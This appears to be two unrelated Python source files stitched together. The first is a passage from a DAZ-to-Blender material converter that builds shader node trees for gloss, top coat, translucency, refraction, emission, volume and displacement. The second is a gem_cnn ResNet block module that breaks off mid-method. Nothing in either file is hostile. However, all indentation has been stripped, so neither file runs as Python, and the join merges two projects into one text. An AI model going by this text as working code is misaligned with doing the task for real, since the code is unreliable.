# glossy bsdf color = iray glossy color * iray glossy layered weight
strength,strtex = self.getColorTex("getChannelGlossyLayeredWeight", "NONE", 1.0, False)
color,tex = self.getColorTex("getChannelGlossyColor", "COLOR", WHITE, False)
if tex and strtex:
tex = self.mixTexs('MULTIPLY', tex, strtex)
elif strtex:
tex = strtex
color = strength*color
if tex:
tex = self.multiplyVectorTex(color, tex)
return color,tex
def buildGlossy(self):
color = self.getColor("getChannelGlossyColor", BLACK)
strength = self.getValue("getChannelGlossyLayeredWeight", 0)
if isBlack(color) or strength == 0:
return
from .cgroup import FresnelGroup
fresnel = self.addGroup(FresnelGroup, "DAZ Fresnel")
ior,iortex = self.getFresnelIOR()
self.linkScalar(iortex, fresnel, ior, "IOR")
self.linkBumpNormal(fresnel)
self.fresnel = fresnel
# glossy bsdf roughness = iray glossy roughness ^ 2
channel,invert = self.material.getChannelGlossiness()
invert = not invert # roughness = invert glossiness
value = clamp( self.material.getChannelValue(channel, 0.0) )
if invert:
roughness = (1-value)
else:
roughness = value
fnroughness = roughness**2
if bpy.app.version < (2,80):
roughness = roughness**2
value = value**2
from .cgroup import GlossyGroup
self.column += 1
glossy = self.addGroup(GlossyGroup, "DAZ Glossy", size=100)
color,tex = self.getGlossyColor()
self.linkColor(tex, glossy, color, "Color")
roughtex = self.addSlot(channel, glossy, "Roughness", roughness, value, invert)
self.linkBumpNormal(glossy)
self.linkScalar(roughtex, fresnel, fnroughness, "Roughness")
LS.usedFeatures["Glossy"] = True
self.mixWithActive(1.0, self.fresnel, glossy)
def getFresnelIOR(self):
# fresnel ior = 1.1 + iray glossy reflectivity * 0.7
# fresnel ior = 1.1 + iray glossy specular / 0.078
ior = 1.45
iortex = None
if self.material.shader == 'UBER_IRAY':
if self.material.basemix == 0: # Metallic/Roughness
value,tex = self.getColorTex("getChannelGlossyReflectivity", "NONE", 0, False)
factor = 0.7 * value
elif self.material.basemix == 1: # Specular/Glossiness
color,tex = self.getColorTex("getChannelGlossySpecular", "COLOR", WHITE, False)
factor = 0.7 * averageColor(color) / 0.078
ior = 1.1 + factor
if tex:
iortex = self.multiplyAddScalarTex(factor, 1.1, tex)
return ior, iortex
#-------------------------------------------------------------
# Top Coat
#-------------------------------------------------------------
def buildTopCoat(self):
if not self.isEnabled("Top Coat"):
return
topweight = self.getValue(["Top Coat Weight"], 0)
if topweight == 0:
return
# Top Coat Layering Mode
# [ "Reflectivity", "Weighted", "Fresnel", "Custom Curve" ]
lmode = self.getValue(["Top Coat Layering Mode"], 0)
fresnel = refltex = None
if lmode == 2: # Fresnel
from .cgroup import FresnelGroup
weight = 0.5
fresnel = self.addGroup(FresnelGroup, "DAZ Fresnel")
ior,iortex = self.getColorTex(["Top Coat IOR"], "NONE", 1.45)
self.linkScalar(iortex, fresnel, ior, "IOR")
if self.material.shader == 'UBER_IRAY':
# Top Coat Bump Mode
# [ "Height Map", "Normal Map" ]
if not fresnel:
refl,refltex = self.getColorTex(["Reflectivity"], "NONE", 0, useFactor=False)
weight = 0.05 * topweight * refl
bump,bumptex = self.getColorTex(["Top Coat Bump"], "NONE", 0, useFactor=False)
else:
if not fresnel:
refl,refltex = self.getColorTex(["Top Coat Reflectivity"], "NONE", 0, useFactor=False)
weight = 0.05 * topweight * refl
bump = self.getValue(["Top Coat Bump Weight"], 0)
bump *= self.bumpval
bumptex = None
_,tex = self.getColorTex(["Top Coat Weight"], "NONE", 0, value=weight)
weighttex = self.multiplyTexs(tex, refltex)
color,coltex = self.getColorTex(["Top Coat Color"], "COLOR", WHITE)
roughness,roughtex = self.getColorTex(["Top Coat Roughness"], "NONE", 0)
if roughness == 0:
glossiness,glosstex = self.getColorTex(["Top Coat Glossiness"], "NONE", 1)
roughness = 1 - glossiness**2
roughtex = self.invertTex(glosstex, 5)
from .cgroup import TopCoatGroup
self.column += 1
top = self.addGroup(TopCoatGroup, "DAZ Top Coat", size=100)
self.linkColor(coltex, top, color, "Color")
self.linkScalar(roughtex, top, roughness, "Roughness")
if self.material.shader == 'PBRSKIN':
if self.bumptex:
self.links.new(self.bumptex.outputs[0], top.inputs["Height"])
self.material.addGeoBump(self.bumptex, top.inputs["Distance"])
self.linkNormal(top)
elif bumptex:
self.links.new(bumptex.outputs[0], top.inputs["Height"])
self.material.addGeoBump(bumptex, top.inputs["Distance"])
self.linkBumpNormal(top)
top.inputs["Bump"].default_value = bump * GS.bumpFactor
self.mixWithActive(weight, weighttex, top)
if fresnel:
self.linkScalar(roughtex, fresnel, roughness, "Roughness")
self.linkBumpNormal(fresnel)
self.links.new(fresnel.outputs[0], top.inputs["Fac"])
#-------------------------------------------------------------
# Translucency
#-------------------------------------------------------------
def checkTranslucency(self):
if not self.isEnabled("Translucency"):
return False
if (self.material.thinWall or
self.volume or
self.material.translucent):
return True
if (self.material.refractive or
not self.material.translucent):
return False
def buildTranslucency(self):
if (GS.materialMethod != 'BSDF' or
not self.checkTranslucency()):
return
fac = self.getValue("getChannelTranslucencyWeight", 0)
effect = self.getValue(["Base Color Effect"], 0)
if fac == 0 and effect != 1:
return
self.column += 1
mat = self.material.rna
color,tex = self.getTranslucentColor()
if isBlack(color):
return
from .cgroup import TranslucentGroup
node = self.addGroup(TranslucentGroup, "DAZ Translucent", size=200)
node.width = 200
self.linkColor(tex, node, color, "Color")
node.inputs["Gamma"].default_value = 3.5
node.inputs["Scale"].default_value = 1.0
ssscolor,ssstex,sssmode = self.getSSSColor()
radius,radtex = self.getSSSRadius(color, ssscolor, ssstex, sssmode)
self.linkColor(radtex, node, radius, "Radius")
node.inputs["Cycles Mix Factor"].default_value = (not GS.useVolume)
node.inputs["Eevee Mix Factor"].default_value = 1.0
self.linkBumpNormal(node)
fac,factex = self.getColorTex("getChannelTranslucencyWeight", "NONE", 0)
if effect == 1: # Scatter and transmit
fac = 0.5 + fac/2
if factex and factex.type == 'MATH':
factex.inputs[0].default_value = fac
self.mixWithActive(fac, factex, node)
LS.usedFeatures["Transparent"] = True
self.endSSS()
def getTranslucentColor(self):
color,tex = self.getColorTex(["Translucency Color"], "COLOR", BLACK)
if (tex is None and
(GS.useFakeTranslucencyTexture or not GS.useVolume)):
tex = self.diffuseTex
return color,tex
def getSSSColor(self):
sssmode = self.getValue(["SSS Mode"], 0)
# [ "Mono", "Chromatic" ]
if sssmode == 1:
color,tex = self.getColorTex("getChannelSSSColor", "COLOR", BLACK)
elif sssmode == 0:
sss,tex = self.getColorTex(["SSS Amount"], "NONE", 0.0)
if sss > 1:
sss = 1
color = (sss,sss,sss)
else:
color,tex = WHITE,None
return color,tex,sssmode
def endSSS(self):
LS.usedFeatures["SSS"] = True
mat = self.material.rna
if hasattr(mat, "use_sss_translucency"):
mat.use_sss_translucency = True
def getSSSRadius(self, color, ssscolor, ssstex, sssmode):
# if there's no volume we use the sss to make translucency
# please note that here we only use the iray base translucency color with no textures
# as for blender 2.8x eevee doesn't support nodes in the radius channel so we deal with it
if self.material.thinWall:
return color,None
if sssmode == 1 and isWhite(ssscolor):
ssscolor = BLACK
elif sssmode == 0: # Mono
s,ssstex = self.getColorTex("getChannelSSSAmount", "NONE", 0)
if s > 1:
s = 1
ssscolor = Vector((s,s,s))
trans,transtex = self.getColorTex(["Transmitted Color"], "COLOR", BLACK)
if isWhite(trans):
trans = BLACK
rad,radtex = self.sumColors(ssscolor, ssstex, trans, transtex)
radius = rad * 2.0 * LS.scale
return radius,radtex
#-------------------------------------------------------------
# Transparency
#-------------------------------------------------------------
def sumColors(self, color, tex, color2, tex2):
if tex and tex2:
tex = self.mixTexs('ADD', tex, tex2)
elif tex2:
tex = tex2
color = Vector(color) + Vector(color2)
return color,tex
def multiplyColors(self, color, tex, color2, tex2):
if tex and tex2:
tex = self.mixTexs('MULTIPLY', tex, tex2)
elif tex2:
tex = tex2
color = self.compProd(color, color2)
return color,tex
def getRefractionColor(self):
if self.material.shareGlossy:
color,tex = self.getColorTex("getChannelGlossyColor", "COLOR", WHITE)
roughness, roughtex = self.getColorTex("getChannelGlossyRoughness", "NONE", 0, False, maxval=1)
else:
color,tex = self.getColorTex("getChannelRefractionColor", "COLOR", WHITE)
roughness,roughtex = self.getColorTex(["Refraction Roughness"], "NONE", 0, False, maxval=1)
return color, tex, roughness, roughtex
def addInput(self, node, channel, slot, colorSpace, default, maxval=0):
value,tex = self.getColorTex(channel, colorSpace, default, maxval=maxval)
if isVector(default):
node.inputs[slot].default_value[0:3] = value
else:
node.inputs[slot].default_value = value
if tex:
self.links.new(tex.outputs[0], node.inputs[slot])
return value,tex
def setRoughness(self, node, slot, roughness, roughtex, square=True):
node.inputs[slot].default_value = roughness
if roughtex:
tex = self.multiplyScalarTex(roughness, roughtex)
if tex:
self.links.new(tex.outputs[0], node.inputs[slot])
return roughness
def buildRefraction(self):
weight,wttex = self.getColorTex("getChannelRefractionWeight", "NONE", 0.0)
if weight == 0:
return
node,color = self.buildRefractionNode()
self.mixWithActive(weight, wttex, node)
if GS.useFakeCaustics and not self.material.thinWall:
from .cgroup import FakeCausticsGroup
self.column += 1
node = self.addGroup(FakeCausticsGroup, "DAZ Fake Caustics", args=[color], force=True)
self.mixWithActive(weight, wttex, node, keep=True)
def buildRefractionNode(self):
from .cgroup import RefractionGroup
self.column += 1
node = self.addGroup(RefractionGroup, "DAZ Refraction", size=150)
node.width = 240
color,tex = self.getColorTex("getChannelGlossyColor", "COLOR", WHITE)
roughness, roughtex = self.getColorTex("getChannelGlossyRoughness", "NONE", 0, False, maxval=1)
roughness = roughness**2
self.linkColor(tex, node, color, "Glossy Color")
self.linkScalar(roughtex, node, roughness, "Glossy Roughness")
color,coltex,roughness,roughtex = self.getRefractionColor()
ior,iortex = self.getColorTex("getChannelIOR", "NONE", 1.45)
roughness = roughness**2
self.linkColor(coltex, node, color, "Refraction Color")
self.linkScalar(iortex, node, ior, "Fresnel IOR")
if self.material.thinWall:
node.inputs["Thin Wall"].default_value = 1
node.inputs["Refraction IOR"].default_value = 1.0
node.inputs["Refraction Roughness"].default_value = 0.0
self.material.setTransSettings(False, True, color, 0.1)
else:
node.inputs["Thin Wall"].default_value = 0
self.linkScalar(roughtex, node, roughness, "Refraction Roughness")
self.linkScalar(iortex, node, ior, "Refraction IOR")
self.material.setTransSettings(True, False, color, 0.2)
self.linkBumpNormal(node)
return node, color
def buildCutout(self):
alpha,tex = self.getColorTex("getChannelCutoutOpacity", "NONE", 1.0)
if alpha < 1 or tex:
self.column += 1
self.useCutout = True
if alpha == 0:
node = self.addNode("ShaderNodeBsdfTransparent")
self.cycles = node
self.eevee = node
tex = None
else:
from .cgroup import TransparentGroup
node = self.addGroup(TransparentGroup, "DAZ Transparent")
self.mixWithActive(alpha, tex, node)
node.inputs["Color"].default_value[0:3] = WHITE
if alpha < 1 or tex:
self.material.setTransSettings(False, False, WHITE, alpha)
LS.usedFeatures["Transparent"] = True
#-------------------------------------------------------------
# Emission
#-------------------------------------------------------------
def buildEmission(self):
if not GS.useEmission:
return
color = self.getColor("getChannelEmissionColor", BLACK)
if not isBlack(color):
from .cgroup import EmissionGroup
self.column += 1
emit = self.addGroup(EmissionGroup, "DAZ Emission")
self.addEmitColor(emit, "Color")
strength = self.getLuminance(emit)
emit.inputs["Strength"].default_value = strength
self.links.new(self.getCyclesSocket(), emit.inputs["Cycles"])
self.links.new(self.getEeveeSocket(), emit.inputs["Eevee"])
self.cycles = self.eevee = emit
self.addOneSided()
def addEmitColor(self, emit, slot):
color,tex = self.getColorTex("getChannelEmissionColor", "COLOR", BLACK)
if tex is None:
_,tex = self.getColorTex(["Luminance"], "COLOR", BLACK)
temp = self.getValue(["Emission Temperature"], None)
if temp is None:
self.linkColor(tex, emit, color, slot)
return
elif temp == 0:
temp = 6500
blackbody = self.addNode("ShaderNodeBlackbody", self.column-2)
blackbody.inputs["Temperature"].default_value = temp
if isWhite(color) and tex is None:
self.links.new(blackbody.outputs["Color"], emit.inputs[slot])
else:
mult = self.addNode("ShaderNodeMixRGB", self.column-1)
mult.blend_type = 'MULTIPLY'
mult.inputs[0].default_value = 1
self.links.new(blackbody.outputs["Color"], mult.inputs[1])
self.linkColor(tex, mult, color, 2)
self.links.new(mult.outputs[0], emit.inputs[slot])
def getLuminance(self, emit):
lum = self.getValue(["Luminance"], 1500)
# "cd/m^2", "kcd/m^2", "cd/ft^2", "cd/cm^2", "lm", "W"
units = self.getValue(["Luminance Units"], 3)
factors = [1, 1000, 10.764, 10000, 1, 1]
strength = lum/2 * factors[units] / 15000
if units >= 4:
self.material.geoemit.append(emit.inputs["Strength"])
if units == 5:
strength *= self.getValue(["Luminous Efficacy"], 1)
return strength
def addOneSided(self):
twosided = self.getValue(["Two Sided Light"], False)
if not twosided:
from .cgroup import OneSidedGroup
node = self.addGroup(OneSidedGroup, "DAZ One-Sided")
self.links.new(self.getCyclesSocket(), node.inputs["Cycles"])
self.links.new(self.getEeveeSocket(), node.inputs["Eevee"])
self.cycles = self.eevee = node
#-------------------------------------------------------------
# Volume
#-------------------------------------------------------------
def invertColor(self, color, tex, col):
inverse = (1-color[0], 1-color[1], 1-color[2])
return inverse, self.invertTex(tex, col)
def buildVolume(self):
if (self.material.thinWall or
GS.materialMethod != "BSDF" or
not GS.useVolume):
return
self.volume = None
if self.isEnabled("Translucency"):
transcolor,transtex = self.getColorTex(["Transmitted Color"], "COLOR", BLACK)
sssmode, ssscolor, ssstex = self.getSSSInfo(transcolor)
if self.isEnabled("Transmission"):
self.buildVolumeTransmission(transcolor, transtex)
if self.isEnabled("Subsurface"):
self.buildVolumeSubSurface(sssmode, ssscolor, ssstex)
if self.volume:
self.volume.width = 240
LS.usedFeatures["Volume"] = True
def getSSSInfo(self, transcolor):
if self.material.shader == 'UBER_IRAY':
sssmode = self.getValue(["SSS Mode"], 0)
elif self.material.shader == 'PBRSKIN':
sssmode = 1
else:
sssmode = 0
# [ "Mono", "Chromatic" ]
if sssmode == 1:
ssscolor,ssstex = self.getColorTex("getChannelSSSColor", "COLOR", BLACK)
return 1, ssscolor, ssstex
else:
return 0, WHITE, None
def buildVolumeTransmission(self, transcolor, transtex):
from .cgroup import VolumeGroup
dist = self.getValue(["Transmitted Measurement Distance"], 0.0)
if not (isBlack(transcolor) or isWhite(transcolor) or dist == 0.0):
self.volume = self.addGroup(VolumeGroup, "DAZ Volume")
self.volume.inputs["Absorbtion Density"].default_value = 100/dist
self.linkColor(transtex, self.volume, transcolor, "Absorbtion Color")
def buildVolumeSubSurface(self, sssmode, ssscolor, ssstex):
from .cgroup import VolumeGroup
if self.material.shader == 'UBER_IRAY':
factor = 50
else:
factor = 25
sss = self.getValue(["SSS Amount"], 0.0)
dist = self.getValue("getChannelScatterDist", 0.0)
if not (sssmode == 0 or isBlack(ssscolor) or isWhite(ssscolor) or dist == 0.0):
color,tex = self.invertColor(ssscolor, ssstex, 6)
if self.volume is None:
self.volume = self.addGroup(VolumeGroup, "DAZ Volume")
self.linkColor(tex, self.volume, color, "Scatter Color")
self.volume.inputs["Scatter Density"].default_value = factor/dist
self.volume.inputs["Scatter Anisotropy"].default_value = self.getValue(["SSS Direction"], 0)
elif sss > 0 and dist > 0.0:
if self.volume is None:
self.volume = self.addGroup(VolumeGroup, "DAZ Volume")
sss,tex = self.getColorTex(["SSS Amount"], "NONE", 0.0)
color = (sss,sss,sss)
self.linkColor(tex, self.volume, color, "Scatter Color")
self.volume.inputs["Scatter Density"].default_value = factor/dist
self.volume.inputs["Scatter Anisotropy"].default_value = self.getValue(["SSS Direction"], 0)
#-------------------------------------------------------------
# Output
#-------------------------------------------------------------
def buildOutput(self):
self.column += 1
output = self.addNode("ShaderNodeOutputMaterial")
output.target = 'ALL'
if self.cycles:
self.links.new(self.getCyclesSocket(), output.inputs["Surface"])
if self.volume and not self.useCutout:
self.links.new(self.volume.outputs[0], output.inputs["Volume"])
if self.displacement:
self.links.new(self.displacement, output.inputs["Displacement"])
if self.liegroups:
node = self.addNode("ShaderNodeValue", col=self.column-1)
node.outputs[0].default_value = 1.0
for lie in self.liegroups:
self.links.new(node.outputs[0], lie.inputs["Alpha"])
if self.volume or self.eevee:
output.target = 'CYCLES'
outputEevee = self.addNode("ShaderNodeOutputMaterial")
outputEevee.target = 'EEVEE'
if self.eevee:
self.links.new(self.getEeveeSocket(), outputEevee.inputs["Surface"])
elif self.cycles:
self.links.new(self.getCyclesSocket(), outputEevee.inputs["Surface"])
if self.displacement:
self.links.new(self.displacement, outputEevee.inputs["Displacement"])
def buildDisplacementNodes(self):
channel = self.material.getChannelDisplacement()
if not( channel and
self.isEnabled("Displacement") and
GS.useDisplacement):
return
tex = self.addTexImageNode(channel, "NONE")
if tex:
strength = self.material.getChannelValue(channel, 1)
if strength == 0:
return
dmin = self.getValue("getChannelDispMin", -0.05)
dmax = self.getValue("getChannelDispMax", 0.05)
if dmin > dmax:
tmp = dmin
dmin = dmax
dmax = tmp
from .cgroup import DisplacementGroup
node = self.addGroup(DisplacementGroup, "DAZ Displacement")
self.links.new(tex.outputs[0], node.inputs["Texture"])
node.inputs["Strength"].default_value = strength
node.inputs["Max"].default_value = LS.scale * dmax
node.inputs["Min"].default_value = LS.scale * dmin
self.linkNormal(node)
self.displacement = node.outputs["Displacement"]
mat = self.material.rna
mat.cycles.displacement_method = 'BOTH'
def addSingleTexture(self, col, asset, map, colorSpace):
isnew = False
img = asset.buildCycles(colorSpace)
if img:
imgname = img.name
else:
imgname = asset.getName()
hasMap = asset.hasMapping(map)
texnode = self.getTexNode(imgname, colorSpace)
if not hasMap and texnode:
return texnode, False
else:
texnode = self.addTextureNode(col, img, imgname, colorSpace)
isnew = True
if not hasMap:
self.setTexNode(imgname, texnode, colorSpace)
return texnode, isnew
def addTextureNode(self, col, img, imgname, colorSpace):
node = self.addNode("ShaderNodeTexImage", col)
node.image = img
node.interpolation = GS.imageInterpolation
node.label = imgname.rsplit("/",1)[-1]
self.setColorSpace(node, colorSpace)
node.name = imgname
if hasattr(node, "image_user"):
node.image_user.frame_duration = 1
node.image_user.frame_current = 1
return node
def setColorSpace(self, node, colorSpace):
if hasattr(node, "color_space"):
node.color_space = colorSpace
def addImageTexNode(self, filepath, tname, col):
img = bpy.data.images.load(filepath)
img.name = os.path.splitext(os.path.basename(filepath))[0]
img.colorspace_settings.name = "Non-Color"
return self.addTextureNode(col, img, tname, "NONE")
def getTexNode(self, key, colorSpace):
if key in self.texnodes.keys():
for texnode,colorSpace1 in self.texnodes[key]:
if colorSpace1 == colorSpace:
return texnode
return None
def setTexNode(self, key, texnode, colorSpace):
if key not in self.texnodes.keys():
self.texnodes[key] = []
self.texnodes[key].append((texnode, colorSpace))
def linkVector(self, texco, node, slot="Vector"):
if (isinstance(texco, bpy.types.NodeSocketVector) or
isinstance(texco, bpy.types.NodeSocketFloat)):
self.links.new(texco, node.inputs[slot])
return
if "Vector" in texco.outputs.keys():
self.links.new(texco.outputs["Vector"], node.inputs[slot])
else:
self.links.new(texco.outputs["UV"], node.inputs[slot])
def addTexImageNode(self, channel, colorSpace=None):
col = self.column-2
assets,maps = self.material.getTextures(channel)
if len(assets) != len(maps):
print(assets)
print(maps)
raise DazError("Bug: Num assets != num maps")
elif len(assets) == 0:
return None
elif len(assets) == 1:
texnode,isnew = self.addSingleTexture(col, assets[0], maps[0], colorSpace)
if isnew:
self.linkVector(self.texco, texnode)
return texnode
from .cgroup import LieGroup
node = self.addNode("ShaderNodeGroup", col)
node.width = 240
try:
name = os.path.basename(assets[0].map.url)
except:
name = "Group"
group = LieGroup()
group.create(node, name, self)
self.linkVector(self.texco, node)
group.addTextureNodes(assets, maps, colorSpace)
node.inputs["Alpha"].default_value = 1
self.liegroups.append(node)
return node
def mixTexs(self, op, tex1, tex2, slot1=0, slot2=0, color1=None, color2=None, fac=1, factex=None):
if fac < 1 or factex:
pass
elif tex1 is None:
return tex2
elif tex2 is None:
return tex1
mix = self.addNode("ShaderNodeMixRGB", self.column-1)
mix.blend_type = op
mix.use_alpha = False
mix.inputs[0].default_value = fac
if factex:
self.links.new(factex.outputs[0], mix.inputs[0])
if color1:
mix.inputs[1].default_value[0:3] = color1
if tex1:
self.links.new(tex1.outputs[slot1], mix.inputs[1])
if color2:
mix.inputs[2].default_value[0:3] = color2
if tex2:
self.links.new(tex2.outputs[slot2], mix.inputs[2])
return mix
def mixWithActive(self, fac, tex, shader, useAlpha=False, keep=False):
if shader.type != 'GROUP':
raise RuntimeError("BUG: mixWithActive", shader.type)
if fac == 0 and tex is None and not keep:
return
elif fac == 1 and tex is None and not keep:
shader.inputs["Fac"].default_value = fac
self.cycles = shader
self.eevee = shader
return
if self.eevee:
self.makeActiveMix("Eevee", self.eevee, self.getEeveeSocket(), fac, tex, shader, useAlpha)
self.eevee = shader
if self.cycles:
self.makeActiveMix("Cycles", self.cycles, self.getCyclesSocket(), fac, tex, shader, useAlpha)
self.cycles = shader
def makeActiveMix(self, slot, active, socket, fac, tex, shader, useAlpha):
self.links.new(socket, shader.inputs[slot])
shader.inputs["Fac"].default_value = fac
if tex:
if useAlpha and "Alpha" in tex.outputs.keys():
texsocket = tex.outputs["Alpha"]
else:
texsocket = tex.outputs[0]
self.links.new(texsocket, shader.inputs["Fac"])
def linkColor(self, tex, node, color, slot=0):
node.inputs[slot].default_value[0:3] = color
if tex:
tex = self.multiplyVectorTex(color, tex)
if tex:
self.links.new(tex.outputs[0], node.inputs[slot])
return tex
def linkScalar(self, tex, node, value, slot):
node.inputs[slot].default_value = value
if tex:
tex = self.multiplyScalarTex(value, tex)
if tex:
self.links.new(tex.outputs[0], node.inputs[slot])
return tex
def addSlot(self, channel, node, slot, value, value0, invert):
node.inputs[slot].default_value = value
tex = self.addTexImageNode(channel, "NONE")
if tex:
tex = self.fixTex(tex, value0, invert)
if tex:
self.links.new(tex.outputs[0], node.inputs[slot])
return tex
def fixTex(self, tex, value, invert):
_,tex = self.multiplySomeTex(value, tex)
if invert:
return self.invertTex(tex, 3)
else:
return tex
def invertTex(self, tex, col):
if tex:
inv = self.addNode("ShaderNodeInvert", col)
self.links.new(tex.outputs[0], inv.inputs["Color"])
return inv
else:
return None
def multiplySomeTex(self, value, tex, slot=0):
if isinstance(value, float) or isinstance(value, int):
if tex and value != 1:
tex = self.multiplyScalarTex(value, tex, slot)
elif tex:
tex = self.multiplyVectorTex(value, tex, slot)
return value,tex
def multiplyVectorTex(self, color, tex, slot=0, col=None):
if isWhite(color):
return tex
elif isBlack(color):
return None
elif (tex and tex.type not in ['TEX_IMAGE', 'GROUP']):
return tex
if col is None:
col = self.column-1
mix = self.addNode("ShaderNodeMixRGB", col)
mix.blend_type = 'MULTIPLY'
mix.inputs[0].default_value = 1.0
mix.inputs[1].default_value[0:3] = color
self.links.new(tex.outputs[0], mix.inputs[2])
return mix
def multiplyScalarTex(self, value, tex, slot=0, col=None):
if value == 1:
return tex
elif value == 0:
return None
elif (tex and tex.type not in ['TEX_IMAGE', 'GROUP']):
return tex
if col is None:
col = self.column-1
mult = self.addNode("ShaderNodeMath", col)
mult.operation = 'MULTIPLY'
mult.inputs[0].default_value = value
self.links.new(tex.outputs[slot], mult.inputs[1])
return mult
def multiplyAddScalarTex(self, factor, term, tex, slot=0, col=None):
if col is None:
col = self.column-1
mult = self.addNode("ShaderNodeMath", col)
try:
mult.operation = 'MULTIPLY_ADD'
ok = True
except TypeError:
ok = False
if ok:
self.links.new(tex.outputs[slot], mult.inputs[0])
mult.inputs[1].default_value = factor
mult.inputs[2].default_value = term
return mult
else:
mult.operation = 'MULTIPLY'
self.links.new(tex.outputs[slot], mult.inputs[0])
mult.inputs[1].default_value = factor
add = self.addNode("ShaderNodeMath", col)
add.operation = 'ADD'
add.inputs[1].default_value = term
self.links.new(mult.outputs[slot], add.inputs[0])
return add
def multiplyTexs(self, tex1, tex2):
if tex1 and tex2:
mult = self.addNode("ShaderNodeMath")
mult.operation = 'MULTIPLY'
self.links.new(tex1.outputs[0], mult.inputs[0])
self.links.new(tex2.outputs[0], mult.inputs[1])
return mult
elif tex1:
return tex1
else:
return tex2
def selectDiffuse(self, marked):
if self.diffuseTex and marked[self.diffuseTex.name]:
self.diffuseTex.select = True
self.nodes.active = self.diffuseTex
def getLink(self, node, slot):
for link in self.links:
if (link.to_node == node and
link.to_socket.name == slot):
return link
return None
def removeLink(self, node, slot):
link = self.getLink(node, slot)
if link:
self.links.remove(link)
def replaceSlot(self, node, slot, value):
node.inputs[slot].default_value = value
self.removeLink(node, slot)
#-------------------------------------------------------------
# Utilities
#-------------------------------------------------------------
def findTree(mat):
tree = CyclesTree(None)
tree.nodes = mat.node_tree.nodes
tree.links = mat.node_tree.links
return tree
def findTexco(tree, col):
nodes = findNodes(tree, "TEX_COORD")
if nodes:
return nodes[0]
else:
return tree.addNode("ShaderNodeTexCoord", col)
def findNodes(tree, nodeType):
nodes = []
for node in tree.nodes.values():
if node.type == nodeType:
nodes.append(node)
return nodes
def findNode(tree, ntypes):
if isinstance(ntypes, list):
for ntype in ntypes:
node = findNode(tree, ntype)
if node:
return node
for node in tree.nodes:
if node.type == ntypes:
return node
return None
def findLinksFrom(tree, ntype):
links = []
for link in tree.links:
if link.from_node.type == ntype:
links.append(link)
return links
def findLinksTo(tree, ntype):
links = []
for link in tree.links:
if link.to_node.type == ntype:
links.append(link)
return links
def getLinkTo(tree, node, slot):
for link in tree.links:
if (link.to_node == node and
link.to_socket.name == slot):
return link
return None
def pruneNodeTree(tree):
marked = {}
output = False
for node in tree.nodes:
marked[node.name] = False
if "Output" in node.name:
marked[node.name] = True
output = True
if not output:
print("No output node")
return marked
nmarked = 0
n = 1
while n > nmarked:
nmarked = n
n = 1
for link in tree.links:
if marked[link.to_node.name]:
marked[link.from_node.name] = True
n += 1
for node in tree.nodes:
node.select = False
if not marked[node.name]:
tree.nodes.remove(node)
return marked
|
# Copyright (c) 2021 Qualcomm Technologies, Inc.
# All rights reserved.
"""
Adapted from: hsn/nn/harmonic_resnet_block.py by <NAME> at github.com/rubenwiersma/hsn
MIT License
Copyright (c) 2020 rubenwiersma
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from functools import partial
import torch
import torch.nn as nn
from torch.utils.checkpoint import checkpoint
from gem_cnn.nn.gem_conv import GemConv
from gem_cnn.nn.regular_nonlin import RegularNonlinearity
class GemResNetBlock(torch.nn.Module):
"""
ResNet block with convolutions, linearities, and non-linearities
Args:
in_channels (int): number of input features
out_channels (int): number of output features
in_order (int): order of input
out_order (int): order of output
n_rings (int): number of radial rings
num_samples (int): number of samples to use for non-linearity. Should be odd
band_limit (int, optional): maximum theta frequency used
last_layer (bool): whether to apply final non-linearity
checkpoint (bool): whether to call GemConv within a torch checkpoint, saving lots of memory
batch_norm (bool): whether use batch norm before non-lienarities
batch (int, optional): if not None, comptue conv in batches of this size, checkpointed
"""
def __init__(
self,
in_channels,
out_channels,
in_order,
out_order,
n_rings,
num_samples,
band_limit=None,
last_layer=False,
checkpoint=False,
batch_norm=False,
batch=None,
):
super().__init__()
self.checkpoint = checkpoint
middle_order = max(in_order, out_order)
self.conv1 = GemConv(
in_channels,
out_channels,
in_order,
middle_order,
n_rings,
band_limit,
batch,
)
self.conv2 = GemConv(
out_channels,
out_channels,
middle_order,
out_order,
n_rings,
band_limit,
batch,
)
# Apply batch norm inside RegularNonLinearity
if batch_norm:
act1 = nn.Sequential(nn.BatchNorm1d(out_channels), nn.ReLU())
act2 = nn.Sequential(nn.BatchNorm1d(out_channels), nn.ReLU())
else:
act1 = act2 = nn.ReLU()
self.nonlin1 = RegularNonlinearity(middle_order, num_samples, act1)
if last_layer:
self.nonlin2 = nn.Identity()
else:
self.nonlin2 = RegularNonlinearity(out_order, num_samples, act2)
if in_channels != out_channels:
self.lin = nn.Conv1d(
in_channels, out_channels, kernel_size=1
) # Equivariant linear map mixing channels
else:
self.lin = nn.Identity()
@staticmethod
def call_conv_dummy(conv, x, edge_index, precomp, connection, _dummy):
return conv(x, edge_index, precomp, connection)
def call_conv(self, conv, x, edge_index, precomp, connection):
if self.checkpoint:
# Create dummy requires_grad argument to suppress pytorch checkpoint warning
dummy = torch.zeros(1, device=x.device).requires_grad_()
return checkpoint(
partial(self.call_conv_dummy, conv),
x,
edge_index,
precomp,
connection,
dummy,
)
return conv(x, edge_index, precomp, connection)
def add_residual(self, y, x):
residual = self.lin(x)
o = min(y.shape[2], residual.shape[2])
y[:, :, :o] = y[:, :, :o] + residual[:, :, :o] # Handle varying orders
return y
def forward(self, x, edge_index, precomp, connection):
"""
Forward pass.
:param x: [num_v, in_channels, 2*in_order+1]
:param edge_index: [n_edges, 2]
:param precomp: [n_edges, 2*band_limit+1, n_rings] computed by GemPrecomp
:param connection: [num_edges]
:return: [num_v, out_channels, 2*out_order+1]
"""
y = self.call_conv(self.conv1, x, edge_index, precomp, connection)
y = self.nonlin1(y)
